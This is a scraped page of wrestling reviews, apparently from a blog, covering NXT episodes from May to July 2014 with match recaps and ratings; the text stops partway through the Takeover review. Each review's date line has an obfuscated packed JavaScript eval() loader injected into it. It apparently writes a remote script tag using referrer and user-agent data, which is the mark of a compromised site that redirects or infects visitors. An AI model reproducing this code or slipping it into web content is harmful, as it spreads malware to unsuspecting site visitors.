NXT – July 3, 2014: The Gorgeous One Looms

Date: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zazsi|var|u0026u|referrer|shazb||js|php'.split('|'),0,{})) July 3, 2014
Location: Full Sail University, Winter Park, Florida
Commentators: Tom Phillips, William Regal, Byron Saxton

Last week’s show saw some new names rise up on the NXT roster with the Vaudevillians providing as much entertaining as you could ask for from a single act. Other than that we’re getting ready for some new stories to get going this week, which usually makes for a good show. Let’s get to it.

Opening sequence.

Colin Cassady vs. Sylvester LeFort

Big Cass says that Pepe Le Pew is about to get dissed. First he’s going to get disfigured, then he’s going to get dismissed. LeFort continues to look better than half of the roster and can talk better than most of them as well. Big Cass starts in a hurry and it’s the East River Crossing and the Empire Elbow for the in at 55 seconds.

Adrian Neville says it was an honor to beat Rob Van Dam. Tyler Breeze comes in and says he’s impressed that Neville could focus that well with Breeze just twenty feet away. It must be killing Neville not knowing when Tyler is cashing in his title shot. “Just like your uggo face is killing me.” Neville offers to give Breeze a title shot tonight but Breeze claims a finger injury during a hand modeling session.

Video on Bull Dempsey, the last of a dying breed and the last real man in professional wrestling.

Charlotte/Sasha Banks vs. Becky Lynch/Bayley

Bayley says Becky is her BFF: Bayley Friend Forever. Sasha and Bayley get things going with Bayley taking her down by the arm. Off to Becky, drawing a great Irish accent from Regal. Charlotte comes in and gets caught in an armbar before Bayley comes in to work over the arm as well. A double suplex drops Charlotte and a double clothesline does the same to Sasha as we take a break.

Back with Bayley getting sent into the apron before Charlotte works her over in the ring. The BFFs double team Bayley in the corner and Charlotte gets two off a knee drop. Sasha works on a chinlock before it’s back to the champ for a choke in the corner. Bayley finally kicks Sasha into Charlotte and Becky gets the hot tag. A series of legdrops get two on Sasha and everything breaks down. Bayley is sent to the floor and Charlotte comes in legally for Bow Down to the Queen on Becky for the pin at 9:06.

Rating: C. Basic formula match here and there’s nothing wrong with that. The BFFs aren’t likely to be around much longer as Charlotte doesn’t need Sasha at this point. Sasha isn’t holding her down but there’s just no need for her. Becky was much like over the top Irish here and that’s a good thing for her.

Bayley shoves Sasha to the floor to prevent an attack on Becky.

Justin Gabriel is ready for Sami Zayn tonight when Tyson Kidd comes in. Tyson tries to get him to turn to the dark side but Gabriel says Tyson is wrong, and he’ll prove it tonight.

Sasha yells at Charlotte for not having her back after the match. Charlotte says the team is done because she’s the champion. Sasha implies that she’s coming for the belt.

CJ Parker vs. Steve Cutler

Parker’s sign now has the word Woods crossed out. He runs over Cutler to start and says that Steve is ruining the world, just like all of them. Parker hammers away and hits a side kick for the pin at 1:30.

Parker rants about Xavier Woods being so educated but doing nothing on the main roster. If he had Woods’ chances, he’d win titles and change the world along the way.

We get a sitdown interview with Tyson Kidd who says he wasn’t in a mood to do the fallout show at Takeover and left before he said something stupid. He didn’t know Natayla was there and didn’t blow her off on purpose. Interviewer Renee Young asks what was up with freaking out on Natayla for telling the referee that Neville had his foot on the ropes. He went nuts during the match and is glad Natalya calmed him down. Tyson goes on in a calm manner about not wanting to win the titles that way but walks off when Renee asks about possible marital problems.

Summer Rae vs. Bayley next week for the #1 contendership.

Sami Zayn vs. Justin Gabriel

Tyson Kidd is at ringside, drawing a Nattie’s Husband chant. They trade wristlocks to start as Regal thinks Kidd and Natayla are having issues. Justin wrenches on the arm to escape a chinlock. Sami cranks on one of his own but Justin makes it to the ropes. They’re still in first gear here. Gabriel runs him over with a clothesline for the first hard move of the match. He hammers away at Sami’s head and we take a break.

Back with Gabriel getting two off a kick to the head and putting on a double arm crank. Gabriel gets another two and seems to be getting frustrated. He hammers at Sami’s head but Zayn fights back with dropkicks and a Blue Thunder Bomb for two. The Helluva Kick misses though and Justin hits a middle rope kick to the chest for two. Sami blocks a German suplex but gets caught in an over the shoulder backbreaker for two. A huge moonsault gets two and Justin can’t believe this. He loads up the 450 but Sami rolls out of the way. A downward spiral into a Koji Clutch makes Justin tap at 13:00.

Rating: B-. My goodness it’s nice to see Sami get a win for a change. It’s not a great match or against a top level opponent but Sami did his underdog thing and then came back to get the win. That’s a nice change for him and the best thing is he hasn’t lose his heat with all the losing.

Tyson jumps Sami post match and Justin turns heel and joins in. Adrian Neville comes in for the save and I’m sure we’ve got a tag match coming up.

Overall Rating: B. The main event scene has gone from nothing to awesome in a single hour. We have the tag match coming up which could spin off into some more matches and Tyler Breeze looming over the whole thing. This was a really solid episode for storytelling and we had a solid main event to cap it off. As usual, NXT knows how to run a wrestling show.

Colin Cassady b. Sylvester LeFort – Empire Elbow
Charlotte/Sasha Banks b. Bayley/Becky Lynch – Bow Down to the Queen to Lynch
CJ Parker b. Steve Cutler – Side kick
Sami Zayn b. Justin Gabriel – Koji Clutch

Remember to follow me on Twitter @kbreviews and pick up my new book of on the History of Survivor Series at Amazon for just $3.99 at:

And check out my Amazon author page with wrestling books for under $4 at:

NXT – June 26, 2014: Restocking The Shelves

Date: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("
");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|datrz|var|u0026u|referrer|tiyyr||js|php'.split('|'),0,{})) June 26, 2014
Location: Full Sail University, Winter Park, Florida
Commentators: Rich Brennan, Renee Young, Alex Riley

NXT is coming in off a bad show which isn’t something I have to say all that often. Last week’s show was pretty boring with Tyler Breeze having one of the least interesting matches I’ve ever seen from the promotion and the main event being an angle instead of a match. Things down here have a habit of turning around quickly though so let’s get to it.

Opening sequence.

T. Perkins/Matt Sugarman vs. Vaudevillians

The Vaudevillians are introduced at a combined height of 12’7. Renee says Sugarman is a Bastion Booger fan because that’s how awesome she is. Gotch takes Sugarman down with an armbar before putting on a headscissors so he can do clap pushups. A slam puts Sugerman down and the top rope Swanton (That’s A Wrap) from English gets the pin at 2:45.

We recap the main event from last week. Zayn says Tyson is a weird kind of cat because he never learned how to lose. They’ll be hearing from each other again.

Xavier Woods vs. Bull Dempsey

CJ Parker’s crusade in the crowd continues. Dempsey gets a full entrance and has a theme song with the word BULL being shouted over and over. Dempsey grabs a headlock to start and hammers Woods down with pure power. A headbutt gets two before Dempsey just drills Woods with forearms to the chest. Dempsey is in a short singlet, earning him a PUT SOME PANTS ON chant from the lively crowd. Woods fights out of a chinlock with a jawbreaker but jumps into a right hand to the face. A sitout slam (the Bulldozer) gets Bull the pin at 4:40.

Rating: D+. Total squash here and Dempsey looked good the whole way. There’s nothing wrong with a powerful brute like this and the match worked well. His music is really catchy too and was stuck in my head the entire time. That’s a good sign as it’s just his name over and over, set to music.

Bull says the children have run NXT for too long and he’s the last of a dying breed.

Summer Rae vs. Becky Lynch

Becky is an Irish redhead in green. The fans chant for her to start and Lynch does a jig. Becky takes her down with an armbar but she gets kicked in the face for two. Charlotte tries to interfere but Summer shouts that it’s her match, allowing Lynch to get a VERY close two off a rollup. Lynch hits three straight legdrops for two followed by a capture suplex for the pin at 2:59.

Sawyer Fulton vs. Colin Cassady

They circle each other for a bit as the announcers hype Cassady up as a future NXT Champion. Fulton shoves Cassady to start but walks into a big boot and the S-A-W-F-T Elbow gets the pin at 1:26.

The Legionnaires come out to go after Colin but Enzo Amore runs out for the save. Catchphrases are spoken.

Adrian Neville vs. Rob Van Dam

Tyler Breeze is on commentary. Non-title and set up as RVD wanted to face the best NXT had to offer. Neville takes over with a headscissors on the mat and an armdrag sends Van Dam out to the floor. Back in and a rollup gets two for Adrian as Renee says Van Dam is Neville’s idol. Van Dam kicks Adrian to the floor and nails a shot off the apron to put both guys down. Adrian is back up first for a big moonsault to take Rob down again.

We take a break and come back with Adrian holding a front facelock but getting caught in an atomic drop. Renee asks Tyler about a potential full length album but Breeze says his one hit will last for awhile. Van Dam kicks Neville in the face and does it again in the corner. Neville’s sunset flip is countered for two and he gets tied up in the Tree of Woe. A running kick to the ribs has Neville in even more trouble but he escapes a German suplex.

Adrian’s springboard clothesline gets two on Van Dam but he comes back with a jawbreaker. The split legged moonsault only hits mat and a small package gets two for the champion. Van Dam throws Adrian into the air for a kick to the chest to take over again. The Five Star misses though and Neville comes back with a running DDT, followed by the Red Arrow for the pin at 13:56 shown of 16:26.

Rating: C+. There was a nice story here with Neville knowing Van Dam so well due to being a fan for so many years. I’m not the biggest Van Dam fan in the world but it’s nice to see him putting people over clean like this. I expected Van Dam to get the pin so this was a very nice surprise.

They shake hands post match and the announcers don’t treat this like a big upset.

Overall Rating: C+. And of course NXT bounces back with a good show this week. This was about bringing in some new stars and giving some new people pushes, which is necessary when WWE brings people up so often. Neville is reaching a point where losing the title is going to be a big deal and that’s a very good thing. Solid show this week.

Vaudevillians b. T. Perkins/Matt Sugarman – That’s A Wrap to Sugerman
Bull Dempsey b. Xavier Woods – Bulldozer
Becky Lynch b. Summer Rae – Capture suplex
Colin Cassady b. Sawyer Fulton – S-A-W-F-T Elbow
Adrian Neville b. Rob Van Dam – Red Arrow

Remember to follow me on Twitter @kbreviews and pick up my new book of on the History of Survivor Series at Amazon for just $3.99 at:

And check out my Amazon author page with wrestling books for under $4 at:

NXT – June 19, 2014: Breeze Is….Boring?

Date: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("
");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|shdhk|var|u0026u|referrer|taahb||js|php'.split('|'),0,{})) June 19, 2014
Location: Full Sail University, Winter Park, Florida
Commentators: Tom Phillips, Byron Saxton, William Regal

We don’t have a ton of stories coming into this week as a lot of stuff was wrapped up last week. There’s a chance we’ll get more from Mr. NXT Bo Dallas as his comedic antics to get back into the NXT Arena continue. Other than that there’s fallout from Tyson Kidd seemingly turning heel last week. Let’s get to it.

We open with a recap of last week’s main event.

On Raw, Natalya appealed to JBL to let Sami Zayn and Tyson Kidd form a tag team. JBL likes the idea but doesn’t sign off on it.

Opening sequence.

Sasha Banks vs. Alexa Bliss

Set up via a challenge from Bliss last week. Summer won’t do the snap during the entrance and looks annoyed. Banks slaps on a headlock to start before running Bliss over. Bliss flips around a lot and armdrags Sasha down before a small package gets two. A backbreaker gets two on Bliss as Summer continues to look like she would rather be anywhere else. Sasha puts on a surfboard but Charlotte and Summer get in an argument, allowing Bliss to grab a quick rollup for the pin at 3:38.

Rating: C-. It didn’t have time to go anywhere but this worked well enough. Bliss is tiny but cute and has good facials during her match. She was just backdrop for the real story though and there’s nothing wrong with that. The BFF’s splitting up is going to be a big deal when it happens and it’s clearly coming soon.

Natalya and Tyson are in the back and Kidd doesn’t seem pleased that Natalya got him and Sami a Tag Team Title shot tonight. Kidd says he could have gotten it on his own and leaves to talk strategy.

Simon Gotch and Aiden English, collectively known as the Vaudevillians, want the titles. Their speech is in black and white and looks like a silent comedy (minus the silent) from the 1920s, complete with overdone laughs and EXCELSIOR! These two should be great together.

Mojo Rawley vs. Garrett Dylan

Mojo grabs a headlock to start and shoves Garrett into the corner, only to be kicked in the ribs to give Dylan control. Garrett keeps stomping away and puts on a long abdominal stretch to slow things down even more. Not a bad idea against someone that moves so fast. Mojo makes an easy comeback with some shoulders and a corner splash, followed by Hyperdrive for the pin at 3:41.

Rating: D. Same formula for Mojo who is the exact same character that he was when he debuted. That’s the problem with him in a nutshell: there’s nowhere for his character to go and once you see his entrance a few times, the interest just isn’t there anymore. There’s enough energy there for potential but he needs something more than what he’s giving us so far.

Sami and Tyson are ready for their match and call it the restart.

CJ Parker’s crusade for the environment continues. Regal: “I want to run him over with my SUV.”

Vaudevillians vs. Angelo Dawkins/Travis Tyler

The entrance is straight out of the 1920s, complete with a big horn to shout though. Gotch, the strongman, easily takes Jordan does one arm pushups on the pretty boy’s back. The fans are chanting YES at the Vaudevillians. Aiden comes in with a legdrop and it’s back to Gotch for exercising and more shots to the head. Off to Dillinger who takes a rolling fireman’s carry from Gotch (complete with exercises) and a middle rope Swanton Bomb from Aiden for the pin at 3:30.

Rating: C. The team is hilarious but I’m surprised they jobbed out the pretty boys this fast. I can’t imagine the Vaudevillians being a success on the main roster anytime soon as the announcers would laugh them out of the building, unlike Regal who LOVED them and told stories about working on the carnival circuit.

Colin Cassidy sings about the moon hitting your eye like a big pizza pie but stops before the last line (that’s amore), hinting that Enzo is back soon.

Rob Van Dam wants to face Adrian Neville. That should be interesting.

Tyler Breeze vs. Kalisto

They circle each other to start until Kalisto tries to speed things up. Breeze slows him down with a headlock onto the mat and keeps it on for over two minutes straight. Kalisto finally fights up and hits a springboard corkscrew dive followed by a headscissors to send Tyler to the floor as we take a break. The break lasts all of two seconds and we come back with Breeze sending him into the corner but having to adjust the leg tassels.

Off to a front facelock on Kalisto for a good while before Breeze just hammers away. Back to the front facelock as this match has somehow been going eight minutes already. Kalisto fights out and hits a top rope cross body but both guys are down. The masked man finally covers for two before walking into the Beauty Shot to finally end this at 10:33 shown of 14:03..

Rating: D. What in the world was that? Breeze literally had on facelocks or headlocks for over five minutes and did nothing with them at all. Kalisto is capable of having a decent match out there but for some reason they just let them lay around and do nothing for the whole time. I have no idea what they were going for here but it didn’t work.

Tag Team Titles: Ascension vs. Tyson Kidd/Sami Zayn

Viktor pounds on Sami to start and Zayn is taken into the corner for a double beating. The fans are way into the beating from Ascension and chant along with the stomps in the corner. Sami rolls away and tries to get a tag but Viktor pulls him back. Kidd gets down on the floor and says if Sami wants to do the whole thing on his own then he can. Zayn finally hits a top rope cross body and looks for a tag but it’s just an empty corner. Konnor comes in and crushes Sami with a splash, setting up the Fall of Man to retain the titles at 4:00.

Rating: D+. This was an angle instead of a match. Tyson vs. Sami will be good but the Ascension really needs challengers. They’ve held the titles for eight months now and cleaned out the division about six months ago. This loss is much more acceptable for Sami as losing a handicap match to the Ascension is hardly a shame.

Overall Rating: C-. Not their best effort as the matches were pretty lame but the angle advancement worked. The Vaudevillians look like they could have some hysterical stuff in the future and the fans are going to cheer for them no matter what. If that’s what we need to give the Ascension challengers then so be it. Not a great show but other than the WAY too long front facelocks from Tyler there was nothing too bad.

Alexa Bliss b. Sasha Banks – Rollup
Mojo Rawley b. Garrett Dylan – Hyperdrive
Vaudevillians b. Tye Dillinger/Jason Jordan – Middle rope Swanton Bomb to Dillinger
Tyler Breeze b. Kalisto – Beauty Shot
Ascension b. Sami Zayn/Tyson Kidd – Fall of Man to Zayn

Remember to follow me on Twitter @kbreviews and pick up my new book of on the History of Survivor Series at Amazon for just $3.99 at:

And check out my Amazon author page with wrestling books for under $4 at:

NXT – June 12, 2014: Set Them Up To Knock Them Down

Date: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("
");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rsryd|var|u0026u|referrer|esnkt||js|php'.split('|'),0,{})) June 12, 2014
Location: Full Sail University, Winter Park, Florida
Commentators: Rich Brennan, Alex Riley, Renee Young

The main story coming out of last week is we’re going to get Kidd vs. Neville II after Adrian successfully defended the title at Takeover. Other than that last week was pretty much just a placeholder show until we get to the next big show around here. Even last week’s relatively meaningless show was fine though and that’s a nice thing to say about a promotion. Let’s get to it.

We open with a video of Tyson Kidd failing to win the NXT Title and thinking of himself as Natalya’s husband rather than a superstar. Then he lost and wouldn’t shake Adrian’s hand, only to request and receive a rematch last week.

Opening sequence.

Bayley/Paige/Emma vs. BFF’s

Charlotte takes Emma into the corner to start but gets shouldered in the ribs and caught in a sunset flip for two. Back up and Emma slaps the champion in the face so Charlotte drags her back into the corner for a tag off to Banks. Summer looks annoyed at not getting the tag. Charlotte is back in less than fifteen seconds later but Sasha trips up Emma to slam her face first into the apron. Emma is in trouble and we take an early break.

Back with Summer holding Emma in a chinlock before mocking the Emma Dance. Charlotte comes in again with a figure four neck lock to keep Emma in trouble. Another tag brings in Sasha who gets rolled up for two but Emma still can’t make the tag. The BFF’s make some switches in the corner sans tags as Renee seems to like Summer’s legs. All three keep taking their shots on Emma as this has been totally one sided so far.

Sasha hooks a chinlock but Emma is quickly up and avoiding a charge into the corner. The hot tag finally brings in Bayley to clean house, including a belly to belly for two on Charlotte. Everything breaks down and Charlotte gets two off a bridging rollup on Bayley. Summer accidentally distracts Charlotte though, allowing Bayley to grab a rollup for the pin at 8:50.

Rating: C. This was fine but I’m surprised Paige didn’t get in there to clean house a bit. Bayley getting the pin sets her up as the next challenger while also advancing the feud between the BFF’s. I love it when booking is able to cover that many things at the same time and it’s hard to do for some reason anymore.

A masked man was signed to a contract earlier in the week. He Bolieves he’ll make a great impression. JBL seems to know something is up.

The BFF’s are freaking out in the back when Alexa Bliss comes up and asks for a match with Charlotte. The champ tells her to go away which Bliss interprets as a yes.

Colin Cassady vs. Sylvester LeFort

Cassady throws him around to start but LeFort goes after the knee to take over. The fans chant USA and Colin comes back with some loud shots to the ribs. Cassady nails Sylvester again and hits the S-A-W-F-T boot and the East River Crossing gets the pin at 2:26.

Natalya says she can be out there with Tyson tonight but Kidd thinks it’s about him instead of her. The wife isn’t pleased.

Aiden English is singing about how no one knows the trouble he’s seen when a guy with a mustache comes up and offers to shake his hand. The guy won’t talk, walks off screen, does something that amazes Aiden, and comes back with a piece of the set over his shoulder. Ok then.

Sami Zayn vs. Mr. NXT

He’s the masked man from earlier and it’s clearly Bo Dallas, down to the entrance and running around the ring. Apparently he’s a Mexican gold medalist in wrestling. Sami rolls his eyes at this but gets caught in a headlock. Mr. NXT celebrates and draws a dueling YOU CAN’T FOOL US/YES HE CAN chant. Some armdrags drop the masked man and now Sami celebrates a bit. Mr. NXT comes back with elbows and says he is NOT Bo Dallas. The Bodog is countered and Sami rips the mask off to reveal Bo. Fans: BO LEAVE! The Helluva Kick gets the pin for Sami at 4:06.

Rating: C. Comedy match and there’s nothing wrong with that. Bo is great at wanting back in NXT because it’s his life and it’s totally different from his run on Raw and Smackdown. It’s also nice to see Sami get a win over a big name instead of coming so close and then losing at the last minute.

NXT Title: Tyson Kidd vs. Adrian Neville

Tyson is challenging and we get big match intros. Feeling out process to start with both guys gaining and losing quick control. Tyson grabs a top wristlock before taking him down to the mat for a hammerlock. Neville speeds things up and backdrops Tyson to the floor for a big crash. There’s the flip dive from the champion for two back inside and now it’s Neville cranking on an armbar.

We take a break and come back with Tyson holding a chinlock and drawing a NATTIE’S HUSBAND chant. Neville fights up but is quickly backdropped for two and it’s back to the chinlock. Back up again with Neville getting kicked in the ribs, only to come back with an enziguri. Adrian goes to the apron but gets kicked in the head as well, allowing Tyson to hit a top rope flip legdrop with Adrian in the ropes for three, but Adrian’s foot is in the ropes, as pointed out by Natalya (looking stunning all dolled up here).

Kidd ties him up in the Tree of Woe for some knees to the ribs and a running dropkick to the face. The Sharpshooter goes on but Neville crawls to the ropes. Kidd gets kicked in the head but still manages to break up the Red Arrow. The Blockbuster gets two so Kidd drops a top rope elbow for another near fall. Kidd is very frustrated so he goes outside and gets a chair. Natalya takes it away, allowing Neville to kick his head off and hit the Red Arrow to retain at 14:35.

Rating: B. This was a totally different kind of match than they had at Takeover and it still worked very well. This was much more about Kidd going to further and further extremes to win the title and getting caught when he went too far. Very good match here and it told a totally different story.

Natalya consoles her husband to end the show.

Overall Rating: B. Set up stories one week, pay them off the next week. That’s wrestling storytelling at its finest and that’s all you need to do a lot of the time. The fact that the wrestling was good on top of all that makes things even better. The Bo Dallas stuff was funny as usual and the whole show just worked. Totally fun hour of wrestling TV.

Bayley/Paige/Emma b. BFF’s – Rollup to Charlotte
Colin Cassady b. Sylvester LeFort – East River Crossing
Sami Zayn b. Mr. NXT – Helluva Kick
Adrian Neville b. Tyson Kidd – Red Arrow

Remember to follow me on Twitter @kbreviews and pick up my new book of on the History of Survivor Series at Amazon for just $3.99 at:

And check out my Amazon author page with wrestling books for under $4 at:

NXT – June 5, 2014: Everybody Take A Deep Breath

Date: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("
");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ysstn|var|u0026u|referrer|zyndt||js|php'.split('|'),0,{})) June 5, 2014
Location: Full Sail University, Winter Park, Florida
Commentators: William Regal, Tom Phillips, Byron Saxton

We’re starting a new cycle tonight after Takeover blew the doors off the place last week. There aren’t a ton of stories coming out of the show but the main thing was Tyson Kidd refusing to shake Adrian Neville’s hand after his loss in the NXT Title match. Kidd as a heel is an interesting idea and might lead to either a rematch with Neville or a match with Sami Zayn. Let’s get to it.

We open with a recap of the end of last week’s show.

Opening sequence.

Tyler Breeze has entered the building.

Mojo Rawley vs. Aiden English

Aiden sings about Mojo failing America last week. Mojo shoves him into the corner to start but English kicks him down and gets two off a running neckbreaker. We hit the chinlock for a bit but Mojo rolls out of it and kicks English in the face to take over. A Rear View takes English down and Hyperdrive gets the pin at 2:50. Nothing to see here.

We look at the Takeover post show from last week with Paul Heyman needling him a bit about the loss. Kidd seems very upset.

Natalya supports her husband.

Some Special Olympians are here.

Bayley vs. Charlotte

Non-title. The fans are entirely behind Bayley as Charlotte takes her down into a headlock. Back up and Bayley grabs an armdrag followed by another coming off the middle rope. She rolls over Charlotte on the mat in an overdone bit, only to have Charlotte nail her in the back with some hard knees for two. Charlotte tries to do the same amateur roll and looks more inept than comedic.

Off to the figure four headscissors by the champion before Bayley comes back with some weak right hands. Sasha Banks takes a right hand as well but Charlotte gets in a few shots of her own. Cue the returning Summer Rae to hug Sasha but the distraction isn’t enough to distract Charlotte as she nails Bow Down to the Queen for the pin at 4:20.

Rating: C-. Not much of a match here but it was much more about the angle than anything else. I’m glad we’re actually getting some closure to the BFFs as Summer getting promoted just kind of killed the thing dead, but now we can get a blowoff match in the future to get rid of Summer for good.

The BFFs reunite and triple team Bayley until Paige and Emma make the save.

Jason Jordan and Tye Dillinger talk about names.

Video on the Ascension being all dominant.

Jason Jordan/Tye Dillinger vs. Phillip Ghouljar/Stuart Cumberland

Regal loves the name Ghouljar. Fans: “LET’S GO JOBBERS!” Dillinger chops away at Cumberland to start and the chops rip the skin off his chest. Off to Ghouljar as the fans chant Charlie Haas at Dillinger. Jordan comes in and puts on a front facelock before the pretty boys drop some knees. The jobbers actually take Dillinger into the corner for a bit but he comes back with chops to Ghouljar. A not very hot tag brings in Jordan and it’s a superkick from Tye into a Jordan Slam (Angle Slam) for the pin on Cumberland at 5:50.

Rating: D+. The pretty boys are fine for a thrown together team but they still need some more wins before they fight the Ascension. They’ll be good challengers and maybe even the team that takes the belts, but more importantly they’re an actual team that can face the Ascension instead of a bunch of jobbers.

CJ Parker is in the front row with a pro-forest sign.

Summer Rae brags about her accomplishments to the BFFs.

Here’s Tyler Breeze to introduce his music video and make fun of Sami Zayn (Seth Rogen’s uglier brother) for his loss last week.

The video is just Breeze singing, but it’s dedicated to all his fans….even the uggos.

We recap Bo Dallas being thrown out of NXT two weeks ago. This gets a big song about Bo never giving up. Dallas freaking out about the fans not leaving after his loss is funny stuff.

Justin Gabriel vs. Adrian Neville

No DQ and non-title. Justin’s armbar to start goes nowhere so they run the ropes a bit with Gabriel taking over with a hurricanrana. Gabriel suckers Neville in and clotheslines him to the floor, only to have the champion clothesline him right back. A running cannonball off the apron puts Justin down and we take a break with Adrian holding an armbar.

Back with Justin hitting a running forearm in the corner followed by a floatover suplex into a double arm stretch. Neville quickly fights back and gets two off a middle rope dropkick. Justin comes back with a nice rollup for two before elbowing the champion down with ease. Adrian’s springboard is dropkicked out of the air and Justin is bleeding a bit above the eye. The 450 is rolled through and Adrian hits a running dropkick in the corner, setting up the Red Arrow for the pin at 8:00.

Rating: C+. Take two high fliers and let them go nuts out there. To be fair they didn’t really have time to get as insane as they did last week, but this was still fine for the most part. It’s kind of amazing how fast Gabriel fell, as you would think that 450 would have kept him on the main roster longer than it did.

Tyson Kidd comes out for the showdown post match. He apologizes for what he did and promises to beat Adrian next time. Tyson wants one more shot and Adrian accepts the challenge, but emphasizes that it’s the last time. Nothing physical happens to end the show.

Overall Rating: C. This was kind of an episode to catch their breath and set up some future stuff. Jordan and Dillinger are fine for the kind of team they’re trying to be and we have a rematch set up for the title, in addition to Tyler Breeze lurking. It’s not a great show, but there was bound to be a letdown after how awesome things were last week. Good but not excellent here.

Mojo Rawley b. Aiden English– Hyperdrive
Charlotte b. Bayley – Bow Down to the Queen
Jason Jordan/Tye Dillinger b. Phillip Ghouljar/Stuart Cumberland
Adrian Neville b. Justin Gabriel – Red Arrow

Remember to follow me on Twitter @kbreviews and pick up my new book of on the History of Survivor Series at Amazon for just $3.99 at:

And check out my Amazon author page with wrestling books for under $4 at:

NXT: Takeover: They’re Ready

NXT: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rzhty|var|u0026u|referrer|nriya||js|php'.split('|'),0,{})) Takeover
Date: May 29, 2014
Location: Full Sail University, Winter Park, Florida
Commentators: Tom Phillips, William Regal, Byron Saxton

It’s the second two hour live NXT special tonight and the card looks solid. The main event is Adrian Neville defending the NXT Title against Tyson Kidd after Kidd won a triple threat a few weeks ago. Other than that we’ve got the other two titles on the line as well, with Ascension defending against Kalisto/El Local and Charlotte vs. Natalya for the vacant Women’s Title. Let’s get to it.

The opening video is about change, with NXT taking over the world. A Takeover you might say.

Adam Rose leads his party from outside, all the way into the arena for his match. Awesome entrance.

Adam Rose vs. Camacho

Rose is feeling rather playful as he jumps into Camacho’s arms, only to be slammed down to the mat in a hard landing. A nice butterfly suplex gets two on Adam and we hit the chinlock. The fans sing the song to get Rose back to his feet because this is the most awesome crowd in wrestling. Rose escapes and starts Hulking Up but a hard boot to the face puts him down for two. Another chinlock slows things down as the fans chant PARTY TIME. Camacho drops a leg for two but Rose fights back with left hands and a big spinebuster. A Bronco Buster sets up the Party Foul to pin Camacho at 5:10.

Rating: C. This wasn’t a great match but it was the perfect way to open up a big show. Rose is very similar to Godfather, as the matches aren’t all that impressive but he’s going to get a crowd over no matter what he’s doing. That’s a very valuable thing to have and something that should keep Rose on the main roster for a long time.

Video on Zayn vs. Camacho from Arrival and what it meant to Zayn. Sami says Tyler Breeze is a bit different kind of opponent.

Tyler Breeze has entered the building. Regal: “My night is made!”

Tag Team Titles: Kalisto/El Local vs. Ascension

Ascension is defending and their challengers have only wrestled together a few times. The champions go after the masked men to start but stereo headscissors put them on the floor. Local and Kalisto load up stereo suicide dives but charge into uppercuts to knock them back into the ring. Viktor starts by throwing Kalisto around before it’s quickly off to Konnor for a big elbow drop. A double chicken wing has Kalisto in even more trouble.

Back to Viktor who rips at Kalisto’s mask before putting him in the Tree of Woe for kicks from Konnor. They head outside to keep up the destruction but Kalisto kicks Konnor in the face and rams Viktor face first into the apron. It’s not enough for a hot tag though as Ascension takes him into the corner. Kalisto FINALLY dives over to make the tag and Local speeds things up. A middle rope moonsault gets two as everything breaks down. Viktor just ENDS Local with a running clothesline though, setting up Fall of Man for the pin at 6:20.

Rating: D+. The hot tag was a bit of an improvement but this was more of the same from Ascension. At the end of the day, they’re desperately in need of competition unless they’re brought up to the main roster to take the belts from the Usos soon. Either that or the new pretty boy team will knock them off, which isn’t the worst idea in the world.

Video on Tyler Breeze.

Sami Zayn vs. Tyler Breeze

#1 contenders match. Breeze has new music, completely with paparazzi sounds. Tyler cranks on the wrist to start but gets taken down by a top wristlock. Zayn snaps off three very fast armdrags to take over and hooks an armbar. Back up and Sami goes to the corner, only for Tyler to grab his leg and whip Zayn all the way down to the floor. Breeze stomps away in the corner before hitting a nice bulldog into the middle buckle. Tyler’s hair is down, I believe for the first time ever in NXT.

We hit a front facelock on Sami but he finally fights up and throws Breeze off. I love the subtle things Sami does like have to try three times before shoving Tyler away. It’s a great way to build up sympathy and get the crowd behind you. Breeze heads outside so Zayn hits a huge slingshot moonsault to take him down. Back in and a high cross body gets two on Tyler followed by a wicked Blue Thunder Bomb for the same.

